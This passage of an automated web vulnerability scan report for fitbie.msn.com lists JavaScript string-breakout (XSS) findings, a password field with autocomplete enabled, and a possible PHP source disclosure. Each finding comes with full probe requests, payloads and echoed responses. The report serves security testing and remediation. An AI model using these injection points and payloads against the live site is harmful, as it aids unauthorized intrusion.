MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:59 +0000
ETag: "1297607759-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:59 GMT
Date: Sun, 13 Feb 2011 14:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/small-changes-big-resultsc49d2';21edd9f2902?destination=node%2Fsmall-changes-big-resultsc49d2';21edd9f2902&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.129. http://fitbie.msn.com/workout/transform-your-body-strength-workout-d [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/transform-your-body-strength-workout-d

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38714'%3b268f0884796 was submitted in the REST URL parameter 2. This input was echoed as 38714';268f0884796 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/transform-your-body-strength-workout-d38714'%3b268f0884796 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:33 +0000
ETag: "1297607793-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:34 GMT
Date: Sun, 13 Feb 2011 14:36:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/transform-your-body-strength-workout-d38714';268f0884796?destination=node%2Ftransform-your-body-strength-workout-d38714';268f0884796&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.130. http://fitbie.msn.com/workout/transform-your-body-strength-workout-e [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/transform-your-body-strength-workout-e

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d4b'%3bd7ab09fe9c9 was submitted in the REST URL parameter 2. This input was echoed as 72d4b';d7ab09fe9c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/transform-your-body-strength-workout-e72d4b'%3bd7ab09fe9c9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:12 +0000
ETag: "1297607772-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:36:12 GMT
Date: Sun, 13 Feb 2011 14:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/transform-your-body-strength-workout-e72d4b';d7ab09fe9c9?destination=node%2Ftransform-your-body-strength-workout-e72d4b';d7ab09fe9c9&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.131. http://fitbie.msn.com/workout/transform-your-body-strength-workout-f [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/transform-your-body-strength-workout-f

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d08'%3bd8903582cfc was submitted in the REST URL parameter 2. This input was echoed as 48d08';d8903582cfc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/transform-your-body-strength-workout-f48d08'%3bd8903582cfc HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:08 +0000
ETag: "1297607768-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:08 GMT
Date: Sun, 13 Feb 2011 14:36:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/transform-your-body-strength-workout-f48d08';d8903582cfc?destination=node%2Ftransform-your-body-strength-workout-f48d08';d8903582cfc&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.132. http://fitbie.msn.com/workout/your-instant-beach-body [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workout/your-instant-beach-body

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9470f'%3be07032cc0e1 was submitted in the REST URL parameter 2. This input was echoed as 9470f';e07032cc0e1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workout/your-instant-beach-body9470f'%3be07032cc0e1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:55 +0000
ETag: "1297607755-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:56 GMT
Date: Sun, 13 Feb 2011 14:35:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/your-instant-beach-body9470f';e07032cc0e1?destination=node%2Fyour-instant-beach-body9470f';e07032cc0e1&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.133. http://fitbie.msn.com/workouts-men/trimming-tools [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /workouts-men/trimming-tools

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc0b1'%3b2f9124a58e9 was submitted in the REST URL parameter 2. This input was echoed as bc0b1';2f9124a58e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workouts-men/trimming-toolsbc0b1'%3b2f9124a58e9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:51 +0000
ETag: "1297607871-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:37:52 GMT
Date: Sun, 13 Feb 2011 14:37:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/trimming-toolsbc0b1';2f9124a58e9?destination=node%2Ftrimming-toolsbc0b1';2f9124a58e9&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

2. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /logout

Issue detail

The page contains a form with the following action URL: https://mc.fitbie.msn.com/user

The form contains the following password field with autocomplete enabled: pass

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /logout HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 403 Forbidden
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:55 +0000
ETag: "1297607815-1"
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Feb 2011 14:36:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<form action="https://mc.fitbie.msn.com/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

3. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://fitbie.msn.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET / HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; fsbrelated=%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%20title%3D%225%20Ways%20to%20Do%20Anything%20Better%22%3E5%20Ways%20to%20Do%20Anything%20Better%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%3E%3Cimg%20src%3D%22/sites/default/files/beet-roots-cutting-board-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%20title%3D%226%20Ways%20to%20Lose%20Weight%20Naturally%20Before%20Your%20Wedding%22%3E6%20Ways%20to%20Lose%20Weight%20Naturally%20Before...%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%3E%3Cimg%20src%3D%22/sites/default/files/bride-slim-healthy-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%20title%3D%226%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%22%3E6%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%3E%3Cimg%20src%3D%22/sites/default/files/guilty-chocolate-snack-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%20title%3D%228%20Ridiculously%20Cheap%20Healthy%20Foods%22%3E8%20Ridiculously%20Cheap%20Healthy%20Foods%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%3E%3Cimg%20src%3D%22/sites/default/files/potatoes-assorted-th.jpg%22%20/%3E%3C/a%3E; _HOP=I=1&TS=1297606884; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297577225-1"
Last-Modified: Sun, 13 Feb 2011 06:07:05 +0000
Content-Type: text/html; charset=utf-8
Date: Sun, 13 Feb 2011 14:22:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 66330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div class="panel-wrap-top clear-block">
<?php// print_r($content);?>
<div class="panel-panel panel-top-left">
...[SNIP]...

4. Cross-domain Referer leakage
There are 5 instances of this issue:

Issue background

